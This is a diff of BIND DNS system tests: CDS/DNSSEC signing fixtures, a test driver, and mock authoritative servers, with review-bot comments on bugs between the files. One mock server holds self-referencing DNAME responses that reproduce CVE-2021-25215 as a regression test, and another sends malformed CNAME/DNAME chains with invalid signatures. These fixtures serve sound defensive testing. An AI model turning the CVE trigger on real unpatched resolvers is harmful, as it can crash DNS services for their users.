+ -S -O full -o $Z -f sig.$1 db.$1
+}
+
+sign null <<EOF
+\$TTL 1h
+@ SOA localhost. root.localhost. (
+ 1 ; serial
+ 1h ; refresh
+ 1h ; retry
+ 1w ; expiry
+ 1h ; minimum
+ )
+;
+ NS localhost.
+;
+EOF
+
+cat sig.null CDS.1 >brk.unsigned-cds
+
+cat db.null CDS.1 | sign cds.1
+cat db.null CDS.2 | sign cds.2
+cat db.null CDS.1 CDS.2 | sign cds.both
+
+tac <sig.cds.1 >sig.cds.rev1
+
+cat db.null CDNSKEY.2 | sign cdnskey.2
+cat db.null CDS.2 CDNSKEY.2 | sign cds.cdnskey.2
+
+$mangle '\s+IN\s+RRSIG\s+CDS .* '$idz' '$Z'\. ' \
+ <sig.cds.1 >brk.rrsig.cds.zsk
+$mangle '\s+IN\s+RRSIG\s+CDS .* '$id1' '$Z'\. ' \
+ <sig.cds.1 >brk.rrsig.cds.ksk
+
+$mangle " IN CDS $id1 ${DEFAULT_ALGORITHM_NUMBER} 1 " <db.cds.1 |
+sign cds-mangled
+
+bad=$($PERL -le "print ($id1 ^ 255);")
+sed "s/IN CDS $id1 ${DEFAULT_ALGORITHM_NUMBER} 1 /IN CDS $bad ${DEFAULT_ALGORITHM_NUMBER} 1 /" <db.cds.1 |
+sign bad-digests
+
+sed "/IN CDS $id1 ${DEFAULT_ALGORITHM_NUMBER} /p;s//IN CDS $bad $ALTERNATIVE_ALGORITHM_NUMBER /" <db.cds.1 |
+sign bad-algos
+
+rm -f dsset-*
diff --git a/bin/tests/system/cds/tests.sh b/bin/tests/system/cds/tests.sh new file mode 100644
index 0000000..700ae63
--- /dev/null
+++ b/bin/tests/system/cds/tests.sh
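Review bot: In `convert()` of cds/setup.sh, `CDS.$n` is the only output written with `>>`; every other file in the function is created with `>`. If setup.sh runs again before clean.sh has removed `CDS*`, the CDS records accumulate in `CDS.1` and `CDS.2`, and those files are then fed into the `sig.cds.*` fixtures, which may no longer match what the tests assume. Truncate like the neighbouring lines: `sed 's/ IN DS / IN CDS /' <DS.$n >CDS.$n`. Separately, the `... | sign NAME` pipelines report only the exit status of `sign`, so a failing `$mangle` or `sed` on the left side is not caught by `set -e`.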
@@ -0,0 +1,243 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +status=0 +n=0 +fail() { + echo_i "failed" + status=$((status + 1)) +} + +runcmd() { + "$@" 1> out.$n 2> err.$n + echo $? +} + +testcase() { + n=$((n + 1)) + echo_i "$name ($n)" + expect=$1 + shift + result=$(runcmd "$@") + check_stdout + check_stderr + if [ "$expect" -ne "$result" ]; then + echo_d "exit status does not match $expect" + fail + fi + unset name err out +} + +check_stderr() { + if [ -n "${err:=}" ]; then + grep -E "$err" err.$n >/dev/null && return 0 + echo_d "stderr did not match '$err'" + else + [ -s err.$n ] || return 0 + fi + cat err.$n | cat_d + fail +} + +check_stdout() { + $DIFF out.$n "${out:-empty}" >/dev/null && return + echo_d "stdout did not match '$out'" + ( echo "wanted" + cat "$out" + echo "got" + cat out.$n + ) | cat_d + fail +} + +Z=cds.test + +name='usage' +err='Usage' +testcase 1 $CDS + +name='need a DS file' +err='DS pathname' +testcase 1 $CDS $Z + +name='name of dsset in directory' +err="./dsset-$Z.: file not found" +testcase 1 $CDS -d . 
$Z + +name='load a file' +err='could not find DS records' +testcase 1 $CDS -d empty $Z + +name='load DS records' +err='path to file containing child data must be specified' +testcase 1 $CDS -d DS.1 $Z + +name='missing DNSKEY' +err='could not find signed DNSKEY RRset' +testcase 1 $CDS -f db.null -d DS.1 $Z + +name='sigs too old' +err='could not validate child DNSKEY RRset' +testcase 1 $CDS -f sig.null -d DS.1 $Z + +name='sigs too old, verbosely' +err='skip RRSIG by key [0-9]+: too old' +testcase 1 $CDS -v1 -f sig.null -d DS.1 $Z + +name='old sigs are allowed' +err='found RRSIG by key' +out=DS.1 +testcase 0 $CDS -v1 -s -7200 -f sig.null -d DS.1 $Z + +name='no CDS/CDNSKEY records' +out=DS.1 +testcase 0 $CDS -s -7200 -f sig.null -d DS.1 $Z + +name='no child records, verbosely' +err='has neither CDS nor CDNSKEY records' +out=DS.1 +testcase 0 $CDS -v1 -s -7200 -f sig.null -d DS.1 $Z + +name='unsigned CDS' +err='missing RRSIG CDS records' +testcase 1 $CDS -f brk.unsigned-cds -d DS.1 $Z + +name='correct signature inception time' +$CDS -v3 -s -7200 -f sig.cds.1 -d DS.1 $Z 1>xout 2>xerr +testcase 0 $PERL checktime.pl 3600 xerr + +name='in-place reads modification time' +testcase 0 $CDS -f sig.cds.1 -i.bak -d DS.inplace $Z + +name='in-place output correct modification time' +testcase 0 $PERL checkmtime.pl 3600 DS.inplace + +name='in-place backup correct modification time' +testcase 0 $PERL checkmtime.pl 7200 DS.inplace.bak + +name='in-place correct output' +testcase 0 $DIFF DS.1 DS.inplace + +name='in-place backup unmodified' +testcase 0 $DIFF DS.1 DS.inplace.bak + +name='one mangled DS' +err='found RRSIG by key' +out=DS.1 +testcase 0 $CDS -v1 -s -7200 -f sig.cds.1 -d DS.broke1 $Z + +name='other mangled DS' +err='found RRSIG by key' +out=DS.1 +testcase 0 $CDS -v1 -s -7200 -f sig.cds.1 -d DS.broke2 $Z + +name='both mangled DS' +err='could not validate child DNSKEY RRset' +testcase 1 $CDS -v1 -s -7200 -f sig.cds.1 -d DS.broke12 $Z + +name='mangle RRSIG CDS by ZSK' +err='found 
RRSIG by key' +out=DS.1 +testcase 0 $CDS -v1 -s -7200 -f brk.rrsig.cds.zsk -d DS.1 $Z + +name='mangle RRSIG CDS by KSK' +err='could not validate child CDS RRset' +testcase 1 $CDS -v1 -s -7200 -f brk.rrsig.cds.ksk -d DS.1 $Z + +name='mangle CDS 1' +err='could not validate child DNSKEY RRset with new DS records' +testcase 1 $CDS -s -7200 -f sig.cds-mangled -d DS.1 $Z + +name='inconsistent digests' +err='do not cover each key with the same set of digest types' +testcase 1 $CDS -s -7200 -f sig.bad-digests -d DS.1 $Z + +name='inconsistent algorithms' +err='missing signature for algorithm' +testcase 1 $CDS -s -7200 -f sig.bad-algos -d DS.1 $Z + +name='add DS records' +out=DS.both +$CDS -s -7200 -f sig.cds.both -d DS.1 $Z >DS.out +# sort to allow for numerical vs lexical order of key tags +testcase 0 sort DS.out + +name='update add' +out=UP.add2 +testcase 0 $CDS -u -s -7200 -f sig.cds.both -d DS.1 $Z + +name='remove DS records' +out=DS.2 +testcase 0 $CDS -s -7200 -f sig.cds.2 -d DS.both $Z + +name='update del' +out=UP.del1 +testcase 0 $CDS -u -s -7200 -f sig.cds.2 -d DS.both $Z + +name='swap DS records' +out=DS.2 +testcase 0 $CDS -s -7200 -f sig.cds.2 -d DS.1 $Z + +name='update swap' +out=UP.swap +testcase 0 $CDS -u -s -7200 -f sig.cds.2 -d DS.1 $Z + +name='TTL from -T' +out=DS.ttl2 +testcase 0 $CDS -T 3600 -s -7200 -f sig.cds.2 -d DS.1 $Z + +name='update TTL from -T' +out=UP.swapttl +testcase 0 $CDS -u -T 3600 -s -7200 -f sig.cds.2 -d DS.1 $Z + +name='update TTL from dsset' +out=UP.swapttl +testcase 0 $CDS -u -s -7200 -f sig.cds.2 -d DS.ttl1 $Z + +name='TTL from -T overrides dsset' +out=DS.ttlong2 +testcase 0 $CDS -T 7200 -s -7200 -f sig.cds.2 -d DS.ttl1 $Z + +name='stable DS record order (changes)' +out=DS.1 +testcase 0 $CDS -s -7200 -f sig.cds.rev1 -d DS.2 $Z + +name='CDNSKEY default algorithm' +out=DS.2-2 +testcase 0 $CDS -s -7200 -f sig.cdnskey.2 -d DS.1 $Z + +name='CDNSKEY SHA1' +out=DS.2-1 +testcase 0 $CDS -a SHA1 -s -7200 -f sig.cdnskey.2 -d DS.1 $Z + 
+name='CDNSKEY two algorithms' +out=DS.2 +testcase 0 $CDS -a SHA1 -a SHA256 -s -7200 -f sig.cdnskey.2 -d DS.1 $Z + +name='CDNSKEY two algorithms, reversed' +out=DS.2 +testcase 0 $CDS -a SHA256 -a SHA1 -s -7200 -f sig.cdnskey.2 -d DS.1 $Z + +name='CDNSKEY and CDS' +out=DS.2 +testcase 0 $CDS -s -7200 -f sig.cds.cdnskey.2 -d DS.1 $Z + +name='prefer CDNSKEY' +out=DS.2-2 +testcase 0 $CDS -D -s -7200 -f sig.cds.cdnskey.2 -d DS.1 $Z + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/chain/README b/bin/tests/system/chain/README new file mode 100644 index 0000000..649142e --- /dev/null +++ b/bin/tests/system/chain/README @@ -0,0 +1,22 @@ +Copyright (C) Internet Systems Consortium, Inc. ("ISC") + +SPDX-License-Identifier: MPL-2.0 + +This Source Code Form is subject to the terms of the Mozilla Public +License, v. 2.0. If a copy of the MPL was not distributed with this +file, you can obtain one at https://mozilla.org/MPL/2.0/. + +See the COPYRIGHT file distributed with this work for additional +information regarding copyright ownership. + +ns1 is the root server. + +ns2 and ns5 are both authoritative servers. + +ans3 is a mock authoritative server that can return various broken +responses. + +ans4 is a mock authoritative server that can return CNAME or DNAME +responses of arbitrary size in arbitrary order. + +ns7 is the resolver under test. diff --git a/bin/tests/system/chain/ans3/ans.pl b/bin/tests/system/chain/ans3/ans.pl new file mode 100644 index 0000000..271b2a4 --- /dev/null +++ b/bin/tests/system/chain/ans3/ans.pl 
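Review bot: In cds/tests.sh, `check_stdout` compares against `"${out:-empty}"`, but its failure path prints `'$out'` and runs `cat "$out"`, so for a test case that sets no `out` the diagnostic names an empty path and `cat ""` fails. Because the script runs under `sh -e`, that failure probably ends the `( ... )` subshell before `cat out.$n` runs, which hides the unexpected output that caused the mismatch. Resolve the default once, e.g. `want=${out:-empty}` at the top of the function, and use `"$want"` in the `$DIFF`, `echo_d` and `cat` lines.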
@@ -0,0 +1,131 @@ +#!/usr/bin/env perl + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +use strict; +use warnings; + +use IO::File; +use Getopt::Long; +use Net::DNS::Nameserver; + +my $pidf = new IO::File "ans.pid", "w" or die "cannot open pid file: $!"; +print $pidf "$$\n" or die "cannot write pid file: $!"; +$pidf->close or die "cannot close pid file: $!"; +sub rmpid { unlink "ans.pid"; exit 1; }; + +$SIG{INT} = \&rmpid; +$SIG{TERM} = \&rmpid; + +my $localaddr = "10.53.0.3"; + +my $localport = int($ENV{'PORT'}); +if (!$localport) { $localport = 5300; } + +my $verbose = 0; +my $ttl = 60; +my $zone = "example.broken"; +my $nsname = "ns3.$zone"; +my $synth = "synth-then-dname.$zone"; +my $synth2 = "synth2-then-dname.$zone"; + +sub reply_handler { + my ($qname, $qclass, $qtype, $peerhost, $query, $conn) = @_; + my ($rcode, @ans, @auth, @add); + + print ("request: $qname/$qtype\n"); + STDOUT->flush(); + + if ($qname eq "example.broken") { + if ($qtype eq "SOA") { + my $rr = new Net::DNS::RR("$qname $ttl $qclass SOA . . 
0 0 0 0 0"); + push @ans, $rr; + } elsif ($qtype eq "NS") { + my $rr = new Net::DNS::RR("$qname $ttl $qclass NS $nsname"); + push @ans, $rr; + $rr = new Net::DNS::RR("$nsname $ttl $qclass A $localaddr"); + push @add, $rr; + } + $rcode = "NOERROR"; + } elsif ($qname eq "cname-to-$synth2") { + my $rr = new Net::DNS::RR("$qname $ttl $qclass CNAME name.$synth2"); + push @ans, $rr; + $rr = new Net::DNS::RR("name.$synth2 $ttl $qclass CNAME name"); + push @ans, $rr; + $rr = new Net::DNS::RR("$synth2 $ttl $qclass DNAME ."); + push @ans, $rr; + $rcode = "NOERROR"; + } elsif ($qname eq "$synth" || $qname eq "$synth2") { + if ($qtype eq "DNAME") { + my $rr = new Net::DNS::RR("$qname $ttl $qclass DNAME ."); + push @ans, $rr; + } + $rcode = "NOERROR"; + } elsif ($qname eq "name.$synth") { + my $rr = new Net::DNS::RR("$qname $ttl $qclass CNAME name."); + push @ans, $rr; + $rr = new Net::DNS::RR("$synth $ttl $qclass DNAME ."); + push @ans, $rr; + $rcode = "NOERROR"; + } elsif ($qname eq "name.$synth2") { + my $rr = new Net::DNS::RR("$qname $ttl $qclass CNAME name."); + push @ans, $rr; + $rr = new Net::DNS::RR("$synth2 $ttl $qclass DNAME ."); + push @ans, $rr; + $rcode = "NOERROR"; + # The following three code branches referring to the "example.dname" + # zone are necessary for the resolver variant of the CVE-2021-25215 + # regression test to work. A named instance cannot be used for + # serving the DNAME records below as a version of BIND vulnerable to + # CVE-2021-25215 would crash while answering the queries asked by + # the tested resolver. + } elsif ($qname eq "ns3.example.dname") { + if ($qtype eq "A") { + my $rr = new Net::DNS::RR("$qname $ttl $qclass A 10.53.0.3"); + push @ans, $rr; + } + if ($qtype eq "AAAA") { + my $rr = new Net::DNS::RR("example.dname. $ttl $qclass SOA . . 0 0 0 0 $ttl"); + push @auth, $rr; + } + $rcode = "NOERROR"; + } elsif ($qname eq "self.example.self.example.dname") { + my $rr = new Net::DNS::RR("self.example.dname. 
$ttl $qclass DNAME dname."); + push @ans, $rr; + $rr = new Net::DNS::RR("$qname $ttl $qclass CNAME self.example.dname."); + push @ans, $rr; + $rcode = "NOERROR"; + } elsif ($qname eq "self.example.dname") { + if ($qtype eq "DNAME") { + my $rr = new Net::DNS::RR("$qname $ttl $qclass DNAME dname."); + push @ans, $rr; + } + $rcode = "NOERROR"; + } else { + $rcode = "REFUSED"; + } + return ($rcode, \@ans, \@auth, \@add, { aa => 1 }); +} + +GetOptions( + 'port=i' => \$localport, + 'verbose!' => \$verbose, +); + +my $ns = Net::DNS::Nameserver->new( + LocalAddr => $localaddr, + LocalPort => $localport, + ReplyHandler => \&reply_handler, + Verbose => $verbose, +); + +$ns->main_loop; diff --git a/bin/tests/system/chain/ans4/README.anspy b/bin/tests/system/chain/ans4/README.anspy new file mode 100644 index 0000000..7cb0bf0 --- /dev/null +++ b/bin/tests/system/chain/ans4/README.anspy @@ -0,0 +1,24 @@ +Copyright (C) Internet Systems Consortium, Inc. ("ISC") + +SPDX-License-Identifier: MPL-2.0 + +This Source Code Form is subject to the terms of the Mozilla Public +License, v. 2.0. If a copy of the MPL was not distributed with this +file, you can obtain one at https://mozilla.org/MPL/2.0/. + +See the COPYRIGHT file distributed with this work for additional +information regarding copyright ownership. + +REQUIREMENTS +ans.py requires at least dnspython 1.12.0. + +"ans.py" is a fairly simple Python script that will respond as an +authoritative server to DNS queries. It opens a UDP socket on 10.53.0.4 +and fd92:7065:b8e:ffff::8, port 5300 (or PORT) (these are for DNS queries) +and a TCP socket addresses on 10.53.0.4 at port 5301 (or EXTRAPORT1) +(this is the control channel). + +Please note that all functionality and formatting are subject to change as +we determine what features the tool will need. + +"ans.py" will respond to queries as follows: TBD diff --git a/bin/tests/system/chain/ans4/ans.py b/bin/tests/system/chain/ans4/ans.py new file mode 100755 index 0000000..839067f 
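Review bot: In chain/ans3/ans.pl, `my $localport = int($ENV{'PORT'});` runs under `use warnings`, so starting the mock server without `PORT` in the environment emits an uninitialized-value warning before the fallback to 5300 applies. Make the default explicit with `my $localport = int($ENV{'PORT'} // 0);` and keep the existing `if (!$localport)` line. The pid file is opened with the indirect-object form `new IO::File "ans.pid", "w"`; `IO::File->new("ans.pid", "w")` is the unambiguous spelling, and the same applies to the `new Net::DNS::RR(...)` calls in `reply_handler`.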
--- /dev/null +++ b/bin/tests/system/chain/ans4/ans.py 
@@ -0,0 +1,386 @@ +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +############################################################################ +# ans.py: See README.anspy for details. +############################################################################ + +from __future__ import print_function +import os +import sys +import signal +import socket +import select +from datetime import datetime, timedelta +import functools + +import dns, dns.message, dns.query +from dns.rdatatype import * +from dns.rdataclass import * +from dns.rcode import * +from dns.name import * + +############################################################################ +# set up the RRs to be returned in the next answer +# +# the message contains up to two pipe-separated ('|') fields. +# +# the first field of the message is a comma-separated list +# of actions indicating what to put into the answer set +# (e.g., a dname, a cname, another cname, etc) +# +# supported actions: +# - cname (cname from the current name to a new one in the same domain) +# - dname (dname to a new domain, plus a synthesized cname) +# - xname ("external" cname, to a new name in a new domain) +# +# example: xname, dname, cname represents a CNAME to an external +# domain which is then answered by a DNAME and synthesized +# CNAME pointing to yet another domain, which is then answered +# by a CNAME within the same domain, and finally an answer +# to the query. each RR in the answer set has a corresponding +# RRSIG. these signatures are not valid, but will exercise the +# response parser. 
+# +# the second field is a comma-separated list of which RRs in the +# answer set to include in the answer, in which order. if prepended +# with 's', the number indicates which signature to include. +# +# examples: for the answer set "cname, cname, cname", an rr set +# '1, s1, 2, s2, 3, s3, 4, s4' indicates that all four RRs should +# be included in the answer, with siagntures, in the original +# order, while 4, s4, 3, s3, 2, s2, 1, s1' indicates the order +# should be reversed, 's3, s3, s3, s3' indicates that the third +# RRSIG should be repeated four times and everything else should +# be omitted, and so on. +# +# if there is no second field (i.e., no pipe symbol appears in +# the line) , the default is to send all answers and signatures. +# if a pipe symbol exists but the second field is empty, then +# nothing is sent at all. +############################################################################ +actions = [] +rrs = [] + + +def ctl_channel(msg): + global actions, rrs + + msg = msg.splitlines().pop(0) + print("received control message: %s" % msg) + + msg = msg.split(b"|") + if len(msg) == 0: + return + + actions = [x.strip() for x in msg[0].split(b",")] + n = functools.reduce( + lambda n, act: (n + (2 if act == b"dname" else 1)), [0] + actions + ) + + if len(msg) == 1: + rrs = [] + for i in range(n): + for b in [False, True]: + rrs.append((i, b)) + return + + rlist = [x.strip() for x in msg[1].split(b",")] + rrs = [] + for item in rlist: + if item[0] == b"s"[0]: + i = int(item[1:].strip()) - 1 + if i > n: + print("invalid index %d" + (i + 1)) + continue + rrs.append((int(item[1:]) - 1, True)) + else: + i = int(item) - 1 + if i > n: + print("invalid index %d" % (i + 1)) + continue + rrs.append((i, False)) + + +############################################################################ +# Respond to a DNS query. 
+############################################################################ +def create_response(msg): + m = dns.message.from_wire(msg) + qname = m.question[0].name.to_text() + labels = qname.lower().split(".") + wantsigs = True if m.ednsflags & dns.flags.DO else False + + # get qtype + rrtype = m.question[0].rdtype + typename = dns.rdatatype.to_text(rrtype) + + # for 'www.example.com.'... + # - name is 'www' + # - domain is 'example.com.' + # - sld is 'example' + # - tld is 'com.' + name = labels.pop(0) + domain = ".".join(labels) + sld = labels.pop(0) + tld = ".".join(labels) + + print("query: " + qname + "/" + typename) + print("domain: " + domain) + + # default answers, depending on QTYPE. + # currently only A, AAAA, TXT and NS are supported. + ttl = 86400 + additionalA = "10.53.0.4" + additionalAAAA = "fd92:7065:b8e:ffff::4" + if typename == "A": + final = "10.53.0.4" + elif typename == "AAAA": + final = "fd92:7065:b8e:ffff::4" + elif typename == "TXT": + final = "Some\ text\ here" + elif typename == "NS": + domain = qname + final = "ns1.%s" % domain + else: + final = None + + # RRSIG rdata - won't validate but will exercise response parsing + t = datetime.now() + delta = timedelta(30) + t1 = t - delta + t2 = t + delta + inception = t1.strftime("%Y%m%d000000") + expiry = t2.strftime("%Y%m%d000000") + sigdata = "OCXH2De0yE4NMTl9UykvOsJ4IBGs/ZIpff2rpaVJrVG7jQfmj50otBAp A0Zo7dpBU4ofv0N/F2Ar6LznCncIojkWptEJIAKA5tHegf/jY39arEpO cevbGp6DKxFhlkLXNcw7k9o7DSw14OaRmgAjXdTFbrl4AiAa0zAttFko Tso=" + + # construct answer set. + answers = [] + sigs = [] + curdom = domain + curname = name + i = 0 + + for action in actions: + if name != "test": + continue + if action == b"xname": + owner = curname + "." + curdom + newname = "cname%d" % i + i += 1 + newdom = "domain%d.%s" % (i, tld) + i += 1 + target = newname + "." 
+ newdom + print("add external CNAME %s to %s" % (owner, target)) + answers.append(dns.rrset.from_text(owner, ttl, IN, CNAME, target)) + rrsig = "CNAME 5 3 %d %s %s 12345 %s %s" % ( + ttl, + expiry, + inception, + domain, + sigdata, + ) + print("add external RRISG(CNAME) %s to %s" % (owner, target)) + sigs.append(dns.rrset.from_text(owner, ttl, IN, RRSIG, rrsig)) + curname = newname + curdom = newdom + continue + + if action == b"cname": + owner = curname + "." + curdom + newname = "cname%d" % i + target = newname + "." + curdom + i += 1 + print("add CNAME %s to %s" % (owner, target)) + answers.append(dns.rrset.from_text(owner, ttl, IN, CNAME, target)) + rrsig = "CNAME 5 3 %d %s %s 12345 %s %s" % ( + ttl, + expiry, + inception, + domain, + sigdata, + ) + print("add RRSIG(CNAME) %s to %s" % (owner, target)) + sigs.append(dns.rrset.from_text(owner, ttl, IN, RRSIG, rrsig)) + curname = newname + continue + + if action == b"dname": + owner = curdom + newdom = "domain%d.%s" % (i, tld) + i += 1 + print("add DNAME %s to %s" % (owner, newdom)) + answers.append(dns.rrset.from_text(owner, ttl, IN, DNAME, newdom)) + rrsig = "DNAME 5 3 %d %s %s 12345 %s %s" % ( + ttl, + expiry, + inception, + domain, + sigdata, + ) + print("add RRSIG(DNAME) %s to %s" % (owner, newdom)) + sigs.append(dns.rrset.from_text(owner, ttl, IN, RRSIG, rrsig)) + owner = curname + "." + curdom + target = curname + "." + newdom + print("add synthesized CNAME %s to %s" % (owner, target)) + answers.append(dns.rrset.from_text(owner, ttl, IN, CNAME, target)) + rrsig = "CNAME 5 3 %d %s %s 12345 %s %s" % ( + ttl, + expiry, + inception, + domain, + sigdata, + ) + print("add synthesized RRSIG(CNAME) %s to %s" % (owner, target)) + sigs.append(dns.rrset.from_text(owner, ttl, IN, RRSIG, rrsig)) + curdom = newdom + continue + + # now add the final answer + owner = curname + "." 
+ curdom + answers.append(dns.rrset.from_text(owner, ttl, IN, rrtype, final)) + rrsig = "%s 5 3 %d %s %s 12345 %s %s" % ( + typename, + ttl, + expiry, + inception, + domain, + sigdata, + ) + sigs.append(dns.rrset.from_text(owner, ttl, IN, RRSIG, rrsig)) + + # prepare the response and convert to wire format + r = dns.message.make_response(m) + + if name != "test": + r.answer.append(answers[-1]) + if wantsigs: + r.answer.append(sigs[-1]) + else: + for i, sig in rrs: + if sig and not wantsigs: + continue + elif sig: + r.answer.append(sigs[i]) + else: + r.answer.append(answers[i]) + + if typename != "NS": + r.authority.append( + dns.rrset.from_text(domain, ttl, IN, "NS", ("ns1.%s" % domain)) + ) + r.additional.append( + dns.rrset.from_text(("ns1.%s" % domain), 86400, IN, A, additionalA) + ) + r.additional.append( + dns.rrset.from_text(("ns1.%s" % domain), 86400, IN, AAAA, additionalAAAA) + ) + + r.flags |= dns.flags.AA + r.use_edns() + return r.to_wire() + + +def sigterm(signum, frame): + print("Shutting down now...") + os.remove("ans.pid") + running = False + sys.exit(0) + + +############################################################################ +# Main +# +# Set up responder and control channel, open the pid file, and start +# the main loop, listening for queries on the query channel or commands +# on the control channel and acting on them. 
+############################################################################ +ip4 = "10.53.0.4" +ip6 = "fd92:7065:b8e:ffff::4" + +try: + port = int(os.environ["PORT"]) +except: + port = 5300 + +try: + ctrlport = int(os.environ["EXTRAPORT1"]) +except: + ctrlport = 5300 + +query4_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +query4_socket.bind((ip4, port)) + +havev6 = True +try: + query6_socket = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM) + try: + query6_socket.bind((ip6, port)) + except: + query6_socket.close() + havev6 = False +except: + havev6 = False + +ctrl_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +ctrl_socket.bind((ip4, ctrlport)) +ctrl_socket.listen(5) + +signal.signal(signal.SIGTERM, sigterm) + +f = open("ans.pid", "w") +pid = os.getpid() +print(pid, file=f) +f.close() + +running = True + +print("Listening on %s port %d" % (ip4, port)) +if havev6: + print("Listening on %s port %d" % (ip6, port)) +print("Control channel on %s port %d" % (ip4, ctrlport)) +print("Ctrl-c to quit") + +if havev6: + input = [query4_socket, query6_socket, ctrl_socket] +else: + input = [query4_socket, ctrl_socket] + +while running: + try: + inputready, outputready, exceptready = select.select(input, [], []) + except select.error as e: + break + except socket.error as e: + break + except KeyboardInterrupt: + break + + for s in inputready: + if s == ctrl_socket: + # Handle control channel input + conn, addr = s.accept() + print("Control channel connected") + while True: + msg = conn.recv(65535) + if not msg: + break + ctl_channel(msg) + conn.close() + if s == query4_socket or s == query6_socket: + print("Query received on %s" % (ip4 if s == query4_socket else ip6)) + # Handle incoming queries + msg = s.recvfrom(65535) + rsp = create_response(msg[0]) + if rsp: + s.sendto(rsp, msg[1]) + if not running: + break diff --git a/bin/tests/system/chain/clean.sh b/bin/tests/system/chain/clean.sh new file mode 100755 index 0000000..57b05a7 --- /dev/null 
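Review bot: In `ctl_channel`, the out-of-range branch for signature indexes builds its message with `"invalid index %d" + (i + 1)`, which raises TypeError instead of printing; it should read `print("invalid index %d" % (i + 1))`, as the non-signature branch already does. The main loop calls `ctl_channel(msg)` and `create_response(msg[0])` with no exception handling, so this error, a non-numeric index reaching `int()`, or `item[0]` on an empty second field (which the header comment documents as valid input) would terminate the responder instead of skipping the bad message. Separately, `sigterm` assigns `running = False` without a `global` declaration, so it only creates a local; `sys.exit(0)` is what actually ends the process.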
+++ b/bin/tests/system/chain/clean.sh
@@ -0,0 +1,18 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+rm -f dig.out.* named*.pid
+rm -f ns*/named.conf
+rm -f */named.memstats */named.recursing */named.lock */named.run */ans.run
+rm -f ns2/K* ns2/dsset-* ns2/*.db.signed
+rm -f ns*/managed-keys.bind*
diff --git a/bin/tests/system/chain/ns1/named.conf.in b/bin/tests/system/chain/ns1/named.conf.in
new file mode 100644
index 0000000..5504261
--- /dev/null
+++ b/bin/tests/system/chain/ns1/named.conf.in
@@ -0,0 +1,27 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.1;
+ notify-source 10.53.0.1;
+ transfer-source 10.53.0.1;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ recursion no;
+ dnssec-validation yes;
+ notify yes;
+};
+
+zone "." { type primary; file "root.db"; };
diff --git a/bin/tests/system/chain/ns1/root.db b/bin/tests/system/chain/ns1/root.db
new file mode 100644
index 0000000..3469fb5
--- /dev/null
+++ b/bin/tests/system/chain/ns1/root.db
@@ -0,0 +1,51 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300
+. IN SOA root.domain.nil a.root.servers.nil. (
+ 2016012800 ; serial
+ 600 ; refresh
+ 600 ; retry
+ 1200 ; expire
+ 600 ; minimum
+ )
+. NS a.root-servers.nil.
+a.root-servers.nil. A 10.53.0.1
+
+example. NS ns2.example.
+ns2.example. A 10.53.0.2
+
+example.broken. NS ns3.example.broken.
+ns3.example.broken. A 10.53.0.3
+
+; for the resolver variant of the CVE-2021-25215 regression test
+example.dname. NS ns3.example.dname.
+ns3.example.dname. A 10.53.0.3
+
+domain0.nil. NS ns2.domain0.nil
+domain1.nil. NS ns2.domain0.nil
+domain2.nil. NS ns2.domain0.nil
+domain3.nil. NS ns2.domain0.nil
+domain4.nil. NS ns2.domain0.nil
+domain5.nil. NS ns2.domain0.nil
+domain6.nil. NS ns2.domain0.nil
+domain7.nil. NS ns2.domain0.nil
+domain8.nil. NS ns2.domain0.nil
+domain9.nil. NS ns2.domain0.nil
+ns2.domain0.nil. A 10.53.0.2
+ns2.domain0.nil. AAAA fd92:7065:b8e:ffff::2
+
+domain.nil. NS ns4.domain.nil
+ns4.domain.nil. A 10.53.0.4
+ns4.domain.nil. AAAA fd92:7065:b8e:ffff::4
+
+domain. NS ns4.domain.
+ns4.domain. A 10.53.0.4
diff --git a/bin/tests/system/chain/ns2/example.db b/bin/tests/system/chain/ns2/example.db
new file mode 100644
index 0000000..c13f2d2
--- /dev/null
+++ b/bin/tests/system/chain/ns2/example.db
